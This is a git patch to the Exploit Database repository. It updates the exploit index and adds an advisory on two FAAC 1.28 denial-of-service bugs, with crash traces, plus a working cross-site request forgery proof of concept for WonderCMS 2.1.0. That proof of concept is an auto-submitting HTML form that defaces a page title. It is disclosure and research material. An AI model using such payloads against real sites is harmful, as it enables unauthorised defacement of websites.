From b00ce2562cfe4a20f7bfab2f44ed417de44fbac9 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 21 Jun 2017 05:01:28 +0000
Subject: [PATCH] DB: 2017-06-21

2 new exploits

Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service

Sudo - 'get_process_ttyname()' Privilege Escalation
Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation

WonderCMS 2.1.0 - Cross-Site Request Forgery
---
 files.csv                           |  4 +-
 platforms/linux/dos/42207.txt       | 52 +++++++++++++++++++++++++
 platforms/php/webapps/42205.html    | 60 +++++++++++++++++++++++++++++
 platforms/windows/webapps/42091.txt |  1 -
 4 files changed, 115 insertions(+), 2 deletions(-)
 create mode 100755 platforms/linux/dos/42207.txt
 create mode 100755 platforms/php/webapps/42205.html

diff --git a/files.csv b/files.csv
index 9b566c5eb..01a037fc8 100644
--- a/files.csv
+++ b/files.csv
@@ -5555,6 +5555,7 @@ id,file,description,date,author,platform,type,port
 42202,platforms/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42203,platforms/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42204,platforms/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42207,platforms/linux/dos/42207.txt,"Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service",2017-06-20,qflb.wu,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9066,7 +9067,7 @@ id,file,description,date,author,platform,type,port
 42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0
 42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0
-42183,platforms/linux/local/42183.c,"Sudo - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
+42183,platforms/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38029,3 +38030,4 @@ id,file,description,date,author,platform,type,port
 42195,platforms/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
 42196,platforms/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
 42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0
+42205,platforms/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps,0
diff --git a/platforms/linux/dos/42207.txt b/platforms/linux/dos/42207.txt
new file mode 100755
index 000000000..bd0746ed1
--- /dev/null
+++ b/platforms/linux/dos/42207.txt
@@ -0,0 +1,52 @@
+Freeware Advanced Audio Coder (FAAC) multiple vulnerabilities
+
+================
+Author : qflb.wu
+===============
+
+Introduction:
+=============
+FAAC is an encoder for a lossy sound compression scheme specified in MPEG-2 Part 7 and MPEG-4 Part 3 standards and known as Advanced Audio Coding (AAC). This encoder is useful for producing files that can be played back on iPod. Moreover, iPod does not understand other sound compression schemes in video files.
+
+Affected version:
+=====
+1.28
+
+Vulnerability Description:
+==========================
+1.
+the wav_open_read function in frontend/input.c in Freeware Advanced Audio Coder (FAAC) 1.28 can cause a denial of service(large loop) via a crafted wav file.
+
+./faac faac_1.28_wav_open_read_large_loop.wav -o out.aac
+
+POC:
+faac_1.28_wav_open_read_large_loop.wav
+CVE:
+CVE-2017-9129
+
+2.
+the faacEncOpen function in libfaac/frame.c in Freeware Advanced Audio Coder (FAAC) 1.28 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
+
+./faac faac_1.28_faacEncOpen_invalid_memory.wav -o out.aac
+
+ASAN:SIGSEGV
+=================================================================
+==49677==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3e959c9b34 (pc 0x7f3e96bf7739 sp 0x7ffe47c93980 bp 0x000000a59e50 T0)
+    #0 0x7f3e96bf7738 in faacEncOpen /home/a/Downloads/faac-1.28/libfaac/frame.c:368
+    #1 0x49c444 in main /home/a/Downloads/faac-1.28/frontend/main.c:803
+    #2 0x7f3e959d3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
+    #3 0x49311c in _start (/home/a/Downloads/faac-1.28/frontend/.libs/lt-faac+0x49311c)
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/faac-1.28/libfaac/frame.c:368 faacEncOpen
+==49677==ABORTING
+
+POC:
+faac_1.28_faacEncOpen_invalid_memory.wav
+CVE:
+CVE-2017-9130
+
+===============================
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42207.zip
diff --git a/platforms/php/webapps/42205.html b/platforms/php/webapps/42205.html
new file mode 100755
index 000000000..eef414efb
--- /dev/null
+++ b/platforms/php/webapps/42205.html
@@ -0,0 +1,60 @@
+<!--
+# Exploit Title: Cross-Site Request Forgery in WonderCMS
+# Date: 2017-06-19
+# Exploit Author: Zerox Security Lab
+# Software Link: https://www.wondercms.com
+# Version: 2.1.0
+# Twitter: https://twitter.com/ZeroxSecLab
+
+0xCode Lab ID:
+---------------
+0xC-201706-002
+
+Introduction:
+-------------
+WonderCMS is a free open source Content Management System. In other
+words, WonderCMS is a free website builder.
+WonderCMS doesn't require any configuration and can be simply unzipped
+and uploaded to your hosting provider. The database is a text file
+which you can copy, move, backup and restore easily.
+
+Proof of Concept (PoC):
+------------------------
+-->
+<html>
+<body>
+<form action="http://localhost/wonder/" method="post">
+	<input name="fieldname" value="title">
+	<input name="content" value="Hacked By 0xCode Security Lab">
+	<input name="target" value="pages">
+	<input type="submit" value="ok">
+</form>
+</body>
+</html>
+<script>
+	document.forms[0].submit();
+</script>
+<!--
+Disclosure Timeline:
+---------------------
+2017-06-16: Vulnerability found.
+2017-06-17: Reported to vendor.
+2017-06-17: Vendor responded and send a new version for test in it.
+2017-06-17: Test new version and vulernability patched successfully.
+2017-06-18: Vendor responded, update released.
+2017-06-19: Public Disclosure.
+
+Fix:
+----
+This issue fixed in WonderCMS 2.2.0
+
+References:
+------------
+https://www.wondercms.com/whatsnew
+https://www.wondercms.com/forum/viewtopic.php?f=8&t=885
+https://github.com/robiso/wondercms/issues/36
+
+Credits & Authors:
+------------------
+Zerox Security Lab
+-->
diff --git a/platforms/windows/webapps/42091.txt b/platforms/windows/webapps/42091.txt
index d69b71834..86d1f4128 100755
--- a/platforms/windows/webapps/42091.txt
+++ b/platforms/windows/webapps/42091.txt
@@ -19,7 +19,6 @@ An independent security researcher has reported this vulnerability to Beyond Sec
 Vendor response
 IBM has released patches to address those vulnerabilities and issued the following CVE’s:
 
-CVE-2016-2183
 CVE-2017-1092
 For more Information – http://www-01.ibm.com/support/docview.wss?uid=swg22002897